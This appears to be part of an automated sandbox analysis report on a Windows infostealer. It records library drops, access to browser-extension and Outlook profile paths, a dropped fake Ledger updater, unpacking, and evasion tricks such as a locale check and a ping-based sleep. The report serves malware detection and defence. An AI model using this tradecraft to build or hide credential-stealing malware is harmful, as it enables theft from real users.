Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: mozglue.pdbP source: DbMBWMxoNv.exe, 00000000.00000002.1930028045.000000007013D000.00000002.00000001.01000000.00000014.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: DbMBWMxoNv.exe, 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: my_library.pdbU source: DbMBWMxoNv.exe, 00000000.00000002.1909531684.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1929824193.000000006D121000.00000002.00000001.01000000.00000007.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1335353461.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, chrome.dll.0.dr
Source:	Binary string: my_library.pdb source: DbMBWMxoNv.exe, DbMBWMxoNv.exe, 00000000.00000002.1909531684.0000000002F60000.00000040.00001000.00020000.00000000.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, DbMBWMxoNv.exe, 00000000.00000002.1929824193.000000006D121000.00000002.00000001.01000000.00000007.sdmp, DbMBWMxoNv.exe, 00000000.00000003.1335353461.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, chrome.dll.0.dr
Source:	Binary string: M:\BACKUP\SOFT\Ledger\LedgerConsole_v1\LedgerLiveClient\Ledger-Live\obj\Release\Ledger-Live.pdbtQ source: RoamingEBFBKKJECA.exe, 00000015.00000000.1840445425.00000000001A2000.00000002.00000001.01000000.00000015.sdmp, RoamingEBFBKKJECA.exe.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: DbMBWMxoNv.exe, 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: DbMBWMxoNv.exe, 00000000.00000002.1930028045.000000007013D000.00000002.00000001.01000000.00000014.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: M:\BACKUP\SOFT\Ledger\LedgerConsole_v1\LedgerLiveClient\Ledger-Live\obj\Release\Ledger-Live.pdb source: RoamingEBFBKKJECA.exe, 00000015.00000000.1840445425.00000000001A2000.00000002.00000001.01000000.00000015.sdmp, RoamingEBFBKKJECA.exe.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Unpacked PE file: 0.2.DbMBWMxoNv.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.seziw:W;.bejec:R;.fedebi:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Unpacked PE file: 0.2.DbMBWMxoNv.exe.400000.1.unpack

Source: RoamingEBFBKKJECA.exe.0.dr

Static PE information: 0x8826E988 [Wed May 21 02:18:48 2042 UTC]

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_0040A090 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,

0_2_0040A090

Source: DbMBWMxoNv.exe	Static PE information: section name: .seziw
Source: DbMBWMxoNv.exe	Static PE information: section name: .bejec
Source: DbMBWMxoNv.exe	Static PE information: section name: .fedebi
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0041B335 push ecx; ret	0_2_0041B348
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Code function: 21_2_00B20CCC pushfd ; iretd	21_2_00B20DE9
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Code function: 21_2_00B20CCC pushad ; retf 6AA3h	21_2_00B20F99
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Code function: 21_2_00B20D62 pushfd ; iretd	21_2_00B20DE9

Source: DbMBWMxoNv.exe	Static PE information: section name: .text entropy: 7.8442702934920465
Source: RoamingEBFBKKJECA.exe.0.dr	Static PE information: section name: .text entropy: 7.542721939942927
Source: LedgerUpdater[1].exe.0.dr	Static PE information: section name: .text entropy: 7.542721939942927

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LedgerUpdater[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00419F20

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-66765

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000

Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Memory allocated: B20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Memory allocated: 2490000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe	Memory allocated: 4490000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Dropped PE file which has not been started: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

API coverage: 6.3 %

Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe TID: 7888

Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E530
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE40
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414B60
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00413B00
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DB80
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F7B0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004140F0
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EE20
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DF10
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_004147C0

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_00418060 GetSystemInfo,wsprintfA,

0_2_00418060

Source: C:\Users\user\AppData\RoamingEBFBKKJECA.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\DbMBWMxoNv.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
